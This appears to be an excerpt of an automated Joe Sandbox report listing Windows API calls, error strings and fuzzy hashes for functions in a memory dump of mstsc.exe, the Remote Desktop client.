                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$ActivityControlEventShellTrace_vsnwprintf
                                                                                                                                                                                        • String ID: %s%s$StringCchPrintf failed!
                                                                                                                                                                                        • API String ID: 2994778881-397920807
                                                                                                                                                                                        • Opcode ID: 82f3b8b7e7c606536bceac4efeee4c951b5a6359ed42adec2318a420da59262d
                                                                                                                                                                                        • Instruction ID: 11e4319c26edb8099dc761bcf72352a2b4eca688bd5bb353f5a8184c2660fe72
                                                                                                                                                                                        • Opcode Fuzzy Hash: 82f3b8b7e7c606536bceac4efeee4c951b5a6359ed42adec2318a420da59262d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4941C1316007446FD71DDE94DD49FAA37EAEB4D300F060099F689D72B2DA68DD809F52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • IsZoomed.USER32(?), ref: 008EB987
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryMessageModuleProcTraceZoomed
                                                                                                                                                                                        • String ID: SyncSessionDisplaySettings failed!$put_FullScreen failed!
                                                                                                                                                                                        • API String ID: 3071394470-3388693860
                                                                                                                                                                                        • Opcode ID: 08ff718411f5321bbdeae29d927bdd1ad74ff5f74395bd8ef628016f9de10389
                                                                                                                                                                                        • Instruction ID: 6f1ede6d858011288e65ed1e599597a6b448deb44364e9a8b7767700ecfcc506
                                                                                                                                                                                        • Opcode Fuzzy Hash: 08ff718411f5321bbdeae29d927bdd1ad74ff5f74395bd8ef628016f9de10389
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C416C302043C05FDB599A1BC898F673796FB87328F28016DE581CB2A6DB71DC81DB12
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • KillTimer.USER32 ref: 008F00EB
                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000007D0,00000000), ref: 008F0138
                                                                                                                                                                                          • Part of subcall function 008F0AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 008F0AE1
                                                                                                                                                                                          • Part of subcall function 008F0AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 008F0AF9
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • SyncSessionDisplaySettings failed, xrefs: 008F00B3
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Timer$AddressClientFreeHandleKillLibraryMessageModuleProcRectRedrawTraceWindow
                                                                                                                                                                                        • String ID: SyncSessionDisplaySettings failed
                                                                                                                                                                                        • API String ID: 2501523316-3120345431
                                                                                                                                                                                        • Opcode ID: 48f40e5460419da66ffe7312be17aaa1ba7cd20602d38603a9071eab33de85f4
                                                                                                                                                                                        • Instruction ID: 0232322072823e71237f653b2a95a28157f535e434fe83f99005f650d38d7227
                                                                                                                                                                                        • Opcode Fuzzy Hash: 48f40e5460419da66ffe7312be17aaa1ba7cd20602d38603a9071eab33de85f4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841AC31604309AFEB299F35C944F3A7BA6FF85304F144059FA40DA2A3CB71D8929F92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(?,?,0000002B,008D2DA4,00000017,?,00000004,NULL,0000000A,NULL,0000000A,NULL,0000000A,00000000), ref: 008EDA22
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$NULL
                                                                                                                                                                                        • API String ID: 471583391-888386124
                                                                                                                                                                                        • Opcode ID: 0f4688c4be3de487172e028cdd3f428d990bdf3a3a3c264897b0ed39f1f2f792
                                                                                                                                                                                        • Instruction ID: 75500c8bb4284d0659af5b7b745b71302f482db834b099584535ebd304dd76e0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f4688c4be3de487172e028cdd3f428d990bdf3a3a3c264897b0ed39f1f2f792
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3741913660038ADACF24AF56CC41ABA7BA5FB96704F14412AED51DB242E2309E5AC7D0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • DestroyWindow.USER32 ref: 008E4B1A
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E4B24
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to end all remaining sessions, xrefs: 008E4BA2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressDestroyErrorFreeHandleLastLibraryMessageModuleProcTraceWindow
                                                                                                                                                                                        • String ID: Failed to end all remaining sessions
                                                                                                                                                                                        • API String ID: 953134514-2746955642
                                                                                                                                                                                        • Opcode ID: 85aa1c3a8340675179698aacc51a84a81f1f00e7b1e8827f593cc6bd6dc09920
                                                                                                                                                                                        • Instruction ID: cd62a4f4a4777d17c6bb6cd020acb93cd8f04821f646eb9d7de56390bd3ef5f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 85aa1c3a8340675179698aacc51a84a81f1f00e7b1e8827f593cc6bd6dc09920
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A313732A003946FD7398E9A9C89F127B9AFB87324F160658F858D71A2C760DC409B92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(?,?,0000002B,008D8C04,0000000E,00000003,00000004,NULL,0000000A,NULL,0000000A,?,00000004,?,00000004,00000000), ref: 0091D915
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$NULL
                                                                                                                                                                                        • API String ID: 471583391-888386124
                                                                                                                                                                                        • Opcode ID: da797ccfc3a29adb1a3fb3841df7b19986dd66d0506bc0528c649458b7358f2b
                                                                                                                                                                                        • Instruction ID: 16fadf62e444c946fa2352676cfa374359e13ad5825322b89cac7bdb1af93362
                                                                                                                                                                                        • Opcode Fuzzy Hash: da797ccfc3a29adb1a3fb3841df7b19986dd66d0506bc0528c649458b7358f2b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D21B436B0220DAAEB24AF54CC41FFB7769EBC4710F14856AEE059B180E6709DC5D7A0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(?,?,0000002B,008D9810,00000031,?,00000004,NULL,0000000A,NULL,0000000A,?,00000004,00000000), ref: 009224B1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$NULL
                                                                                                                                                                                        • API String ID: 471583391-888386124
                                                                                                                                                                                        • Opcode ID: 2248b52738d1d1127f9aa24798a5f699dc45280d582d6b139293e709b9cbdd27
                                                                                                                                                                                        • Instruction ID: 7c8a2ffc4257432b55e968b10de1b6c2b4fac7ff7cf1e59f85c10d8de813e5d7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2248b52738d1d1127f9aa24798a5f699dc45280d582d6b139293e709b9cbdd27
                                                                                                                                                                                        • Instruction Fuzzy Hash: A3212736600225BADF24AF54EC01FB77769EB84700F288526FE059B1A8E6709E45C3E0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EndDialog.USER32 ref: 00920B20
                                                                                                                                                                                        • IsWindow.USER32(?), ref: 00920B79
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressDialogFreeHandleLibraryMessageModuleProcTraceWindow
                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                        • API String ID: 4127607370-1037565863
                                                                                                                                                                                        • Opcode ID: 22005b448a7db3faaf0fd4ca5352e10222a70a03117900b263240f41cb2d3424
                                                                                                                                                                                        • Instruction ID: 2d7904be9c4f6434564a0951dec88b2c2aeb6367b5ba3672db8e8fc665a21d89
                                                                                                                                                                                        • Opcode Fuzzy Hash: 22005b448a7db3faaf0fd4ca5352e10222a70a03117900b263240f41cb2d3424
                                                                                                                                                                                        • Instruction Fuzzy Hash: D8217A31214358AFDF389F29F449B263BA5EB85318F10405AF9018B1BACA31CD50DF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?,00926ADC,?,?,?,?,?,00000000,00000000), ref: 00927924
                                                                                                                                                                                        • CertDuplicateCertificateContext.CRYPT32(?,?,00000000,?,?,?,?,00926ADC,?,?,?,?,?,00000000,00000000,?), ref: 0092798B
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008DF9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,008D1728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,008DFBF2,008E396B), ref: 008DFA1C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressAllocCertCertificateContextDuplicateFreeHandleLibraryLocalMessageModuleProcTrace
                                                                                                                                                                                        • String ID: pCertArray
                                                                                                                                                                                        • API String ID: 2178560606-662488200
                                                                                                                                                                                        • Opcode ID: 29dd24d8baea3f531f1e57819c878cff9bbe741a4994950a665e04da91834b71
                                                                                                                                                                                        • Instruction ID: 8b4cd0a6f830ba588c735b1997f297d026a755cae0b58841ec2ebd9a563a7256
                                                                                                                                                                                        • Opcode Fuzzy Hash: 29dd24d8baea3f531f1e57819c878cff9bbe741a4994950a665e04da91834b71
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321DFBA604324AFC724DF98D884E16BBE9FB49350B21419AFC44EB362C631DC40DB90
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoCreateInstance.OLE32(008D11C4,00000000,00000001,008DA384,?), ref: 0092B289
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CoCreateInstance failed!, xrefs: 0092B2AE
                                                                                                                                                                                        • pHomeGroup->IsMember failed!, xrefs: 0092B2F4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
                                                                                                                                                                                        • String ID: CoCreateInstance failed!$pHomeGroup->IsMember failed!
                                                                                                                                                                                        • API String ID: 3463782917-307709413
                                                                                                                                                                                        • Opcode ID: 3f2d603c35a8f54dd9a39d116ae3d4ffd10a55dabd40c102f4a04ddd53923c78
                                                                                                                                                                                        • Instruction ID: 891191336645ce3c85b34ad8d53bec901c22f161c530fc77614428c4de44ef35
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f2d603c35a8f54dd9a39d116ae3d4ffd10a55dabd40c102f4a04ddd53923c78
                                                                                                                                                                                        • Instruction Fuzzy Hash: 012177B0610344EFDB1CCF95E94AF2A7BAEEB49304F28008DF5419A2A6C775ED41DB12
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(80070057,008E396B,0000002B,008DB970,008E396B,?,00000004,NULL,00000005,?,00000005,80070057,00000004,00000000,?,FF000000), ref: 0090BAA2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: NULL$W
                                                                                                                                                                                        • API String ID: 471583391-3636870356
                                                                                                                                                                                        • Opcode ID: 6836cc530bdc6b1f02a8e08e03ebcb4475e01a2fb59c3851cafee21d32132c90
                                                                                                                                                                                        • Instruction ID: dadb7e9c8cec3204ba0ebe1f77d06c138db11a2b069cdf9fcfc38325598d50de
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6836cc530bdc6b1f02a8e08e03ebcb4475e01a2fb59c3851cafee21d32132c90
                                                                                                                                                                                        • Instruction Fuzzy Hash: EC110876740209BFDF24CE499C44FABBB7DEF84750F108169AE59A7290C7315E058BA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EndDialog.USER32 ref: 0091011B
                                                                                                                                                                                          • Part of subcall function 009320A0: IsDlgButtonChecked.USER32(?,00003301,?,00905407), ref: 009320BE
                                                                                                                                                                                          • Part of subcall function 009320A0: IsDlgButtonChecked.USER32(?,000036C6,?,00905407), ref: 009320D4
                                                                                                                                                                                        • EndDialog.USER32 ref: 00910138
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 00910147
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonCheckedDialog
                                                                                                                                                                                        • String ID: mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7
                                                                                                                                                                                        • API String ID: 2092719057-504666242
                                                                                                                                                                                        • Opcode ID: c7cbb02b58ff709e390f4b723397e1b3184fe71d30c09879802d9b3f76c88445
                                                                                                                                                                                        • Instruction ID: 2a63c6975c30e29ada1fc2c159495799c51ea21b9c2032638292193f09ca0cd8
                                                                                                                                                                                        • Opcode Fuzzy Hash: c7cbb02b58ff709e390f4b723397e1b3184fe71d30c09879802d9b3f76c88445
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5211963130410DBBCB255F54DD4AEFA7B69EB85750F044114FD159A1A0C7B6D9E0D790
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 00909323
                                                                                                                                                                                        • SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009093AE
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 568519121-3916222277
                                                                                                                                                                                        • Opcode ID: c16425f97d94dbe625b04063d4b4b0956d42807723bf063d29f637c60cf1db2f
                                                                                                                                                                                        • Instruction ID: 89ea8eaa6abdc3772f8e238af337a9d73c11140934ca6a6087faa28b365b49fc
                                                                                                                                                                                        • Opcode Fuzzy Hash: c16425f97d94dbe625b04063d4b4b0956d42807723bf063d29f637c60cf1db2f
                                                                                                                                                                                        • Instruction Fuzzy Hash: DA119A7590031CAFDB10DF65DC49BDBB3F9EB88310F1085A9A509D3251DA74AE448F44
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(?,00000000,0000002B,008D8AB4,00000028,00000000,00000004,NULL,0000000A,0091BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 008ED8F1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$NULL
                                                                                                                                                                                        • API String ID: 471583391-888386124
                                                                                                                                                                                        • Opcode ID: e6f014f30d24420d19552025018371766e2179640a4d6d4432723388d7afbabe
                                                                                                                                                                                        • Instruction ID: c577ce985308e3b416b51b1fca689d48feda7b8663b0d4e9ee95575102adfea3
                                                                                                                                                                                        • Opcode Fuzzy Hash: e6f014f30d24420d19552025018371766e2179640a4d6d4432723388d7afbabe
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D11E576900268BBDB249F55DC02FBB776CFB86710F14493ABE05DB180E2719D59C3A1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000082,00000000,?,00000000), ref: 008ED1FE
                                                                                                                                                                                        • PostMessageW.USER32 ref: 008ED269
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$AddressFreeHandleInfoLibraryModuleParametersPostProcSystemTrace
                                                                                                                                                                                        • String ID: put_FullScreen failed!
                                                                                                                                                                                        • API String ID: 2397186937-1360584600
                                                                                                                                                                                        • Opcode ID: 708908c55baa9f74b3a98613e580a7e55441cd74edf5cbe4e19b96b8587543f8
                                                                                                                                                                                        • Instruction ID: 541b244bb67e0cd9f2b233b00441be6ecc9c99f73c82c6679f8a329ec9425843
                                                                                                                                                                                        • Opcode Fuzzy Hash: 708908c55baa9f74b3a98613e580a7e55441cd74edf5cbe4e19b96b8587543f8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F11E5B2604348BFD7148F9ADC89E6ABBADFB46364F000165F904D7261C772EC14DBA1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SetRect.USER32 ref: 008F42E4
                                                                                                                                                                                          • Part of subcall function 008E6497: MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 008E64E1
                                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 008F42C6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Rect$ByteCharCopyMultiWide
                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                        • API String ID: 3526781790-3887548279
                                                                                                                                                                                        • Opcode ID: 5c223afa89b66917e333258c8f336d76fbb1ae76ea0c61a4a6b1477f4e6209fe
                                                                                                                                                                                        • Instruction ID: c15052fae850d5d2c5668a2d4c030a5c73c27bfc1c63366ef38423311603af64
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c223afa89b66917e333258c8f336d76fbb1ae76ea0c61a4a6b1477f4e6209fe
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C01F93670020867DB18AA7E5C5ABFF7768EB89324F10413AFA02F62C2DE30D9044B65
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D6680,00000143,?,00000004,00000000,00000004,NULL,0000000A,00000000,00000000,00000000,?,00900066), ref: 008F69EE
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$NULL
                                                                                                                                                                                        • API String ID: 471583391-888386124
                                                                                                                                                                                        • Opcode ID: 5894ef8a1893843615334b65dd8143392b980536479c31575994e540fb49b93f
                                                                                                                                                                                        • Instruction ID: d004fa740e9d959b4b524d4c37b813b098621a5d64c0988ee0659e92cebf7e27
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5894ef8a1893843615334b65dd8143392b980536479c31575994e540fb49b93f
                                                                                                                                                                                        • Instruction Fuzzy Hash: D501B13538020AA6EB248E65DC02FB73B25FBD4B50F04871AFB15DB190E2F09D6AC391
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • MonitorFromWindow.USER32(?,00000002,008D2988,0093A020), ref: 0091BB35
                                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,00000000), ref: 0091BB4B
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
